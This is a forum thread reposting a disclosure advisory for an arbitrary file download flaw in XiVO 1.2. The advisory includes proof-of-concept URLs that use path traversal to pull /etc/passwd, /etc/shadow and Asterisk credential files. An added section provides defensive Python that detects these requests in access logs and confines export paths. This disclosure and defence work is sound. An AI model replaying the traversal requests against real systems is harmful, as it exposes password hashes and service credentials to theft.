The_Arhitect Posted November 7, 2012

Xivo 1.2 Arbitrary File Download

Xivo 1.2 Arbitrary File Download under root privileges
===============================================================
Date: 6/11/2012
Exploit Author: Mr.Un1k0d3r
Vendor Homepage: https://wiki.xivo.fr
Software Link: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD
Version: 1.2 (last patched version)
Tested on: Linux xivo 2.6.32-5-486

Exploit:
Using the web interface you can download any file from the system. The web application is running under root privileges. You can download clear text passwords, /etc/passwd, /etc/shadow and many more...

POC:
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/shadow
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/manager.conf
https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/asterisk/cel_pgsql.conf

This vulnerability was discovered by Mr.Un1k0d3r from RingZer0 Team.

Exploit-DB Note:
This appears to have been fixed
https://projects.xivo.fr/issues/3912
http://git.xivo.fr/?p=official/xivo-skaro.git;a=commit;h=127ab43e6d8e8ed94f16ff388fb62fd611a40e19

Source: Xivo 1.2 Arbitrary File Download
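The flaw above is a path traversal in the `id` parameter of the certificate export action. As an added example (not from the advisory or the XiVO project), here is a defender's view of it: a scanner that flags such requests in constructed web-server access-log lines, and the kind of path check the export handler should apply. The certificate-id naming rule and the log format are assumptions.

```python
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Nov/2012:10:01:02 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=webserver HTTP/1.1" 200 1432
10.0.0.9 - - [07/Nov/2012:10:02:17 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd HTTP/1.1" 200 2051
10.0.0.9 - - [07/Nov/2012:10:02:40 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=export&id=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1287
10.0.0.7 - - [07/Nov/2012:10:03:05 +0000] "GET /xivo/configuration/index.php/manage/certificate/?act=list HTTP/1.1" 200 511
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Assumed allowlist for certificate ids: a plain file name, never "." or ".." and never a path.
CERT_ID_RE = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9_.-]*$")


def is_traversal_export(url: str) -> bool:
    """True if the URL targets the certificate export action with an id that is not a plain name."""
    parts = urlsplit(url)
    if "/manage/certificate/" not in parts.path:
        return False
    query = parse_qs(parts.query)  # parse_qs already undoes one layer of %-encoding
    if query.get("act") != ["export"]:
        return False
    for cert_id in query.get("id", []):
        decoded = unquote(cert_id)  # catch a second, double-encoded layer as well
        if "/" in decoded or "\\" in decoded or not CERT_ID_RE.match(decoded):
            return True
    return False


def find_traversal_requests(log_text: str) -> List[str]:
    """Return the client IP of every log line that looks like exploitation of the export endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal_export(m.group(1)):
            hits.append(line.split()[0])
    return hits


def safe_export_path(cert_dir: str, cert_id: str) -> Optional[str]:
    """Mitigation: resolve the id to a file strictly inside cert_dir, or refuse with None."""
    if not CERT_ID_RE.match(cert_id):
        return None
    base = os.path.realpath(cert_dir)
    target = os.path.realpath(os.path.join(base, cert_id))
    return target if os.path.commonpath([base, target]) == base else None
```

Run against the sample log, `find_traversal_requests` reports only the two requests from 10.0.0.9, including the URL-encoded one; the other lines are ordinary use of the interface.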
XnEOS Posted December 18, 2012

Hey, can you at least say what I can do with it?